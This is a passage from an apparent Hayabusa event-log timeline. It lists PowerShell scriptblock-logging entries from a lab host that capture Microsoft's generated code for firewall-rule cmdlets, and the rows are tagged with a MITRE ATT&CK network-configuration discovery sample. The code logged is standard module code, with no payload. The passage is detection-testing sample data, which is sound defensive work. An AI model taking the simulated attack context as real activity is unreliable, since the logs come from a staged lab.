if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } 
$__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function 
Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] 
[Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAl",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"l')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object 
$script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and 